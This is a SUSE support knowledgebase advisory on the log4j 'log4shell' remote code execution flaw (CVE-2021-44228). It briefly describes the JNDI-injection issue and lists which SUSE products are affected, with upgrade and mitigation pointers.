Security vulnerability: log4j remote code execution aka log4shell CVE-2021-44228

This document (000020526) is provided subject to the disclaimer at the end of this document.

Environment

All products

Situation

A 0-day exploit in the log4j Java logging framework was found by Chen Zhaojun of Alibaba Cloud Security Team, which allowed remote attackers able to inject strings into log4j based Java logging to execute code by
exploiting the default enabled JNDI bindings. This is possible without any preconditions, making it critical.

Resolution

SUSE considers log4j versions 2.0 and newer as affected, log4j 1.2.x does not have the same critical vulnerability and is not considered affected by this CVE.

SUSE Linux Enterprise products do not ship log4j 2.x.
SUSE Manager does not ship log4j 2.x.
SUSE Enterprise Storage does not ship log4j 2.x.
SUSE Openstack Cloud embeds log4j2 in the "storm" component, which will receive updates.
SUSE NeuVector product does not ship log4j 2.x.

SUSE Rancher is not affected by this vulnerability. The Helm chart for Istio 1.5, provided by Rancher and which is currently deprecated, includes Zipkin and is vulnerable to Log4j. Customers are advised to upgrade to the recent Istio version provided in Cluster Explorer, which does not uses Zipkin and is not affect to the vulnerability.


Please refer to the upstream guidance from log4j on fixing and mitigation measures if you deploy your Java Application stacks.

Status

Security Alert

Additional Information

Additional information can be found here: Note in regards to SUSE Manager Server:
The CVE-search will use meta-data within a patch to display the needed information. As there is no patch needed (as SUSE is not effected), the CVE-search for CVE-2021-44228 will return a "not found".

 

Disclaimer

This Support Knowledgebase provides a valuable tool for SUSE customers and parties interested in our products and solutions to acquire information, ideas and learn from one another. Materials are provided for informational, personal or non-commercial use within your organization and are presented "AS IS" WITHOUT WARRANTY OF ANY KIND.

  • Document ID:000020526
  • Creation Date: 15-Dec-2021
  • Modified Date:15-Dec-2021
    • SUSE Enterprise Storage
    • SUSE Linux Enterprise Server
    • SUSE Open Stack Cloud
    • SUSE Manager
    • SUSE Rancher

< Back to Support Search

For questions or concerns with the SUSE Knowledgebase please contact: tidfeedback[at]suse.com

SUSE Support Forums

Get your questions answered by experienced Sys Ops or interact with other SUSE community experts.

Join Our Community

Support Resources

Learn how to get the most from the technical support you receive with your SUSE Subscription, Premium Support, Academic Program, or Partner Program.


SUSE Customer Support Quick Reference Guide SUSE Technical Support Handbook Update Advisories
Support FAQ

Open an Incident

Open an incident with SUSE Technical Support, manage your subscriptions, download patches, or manage user access.

Go to Customer Center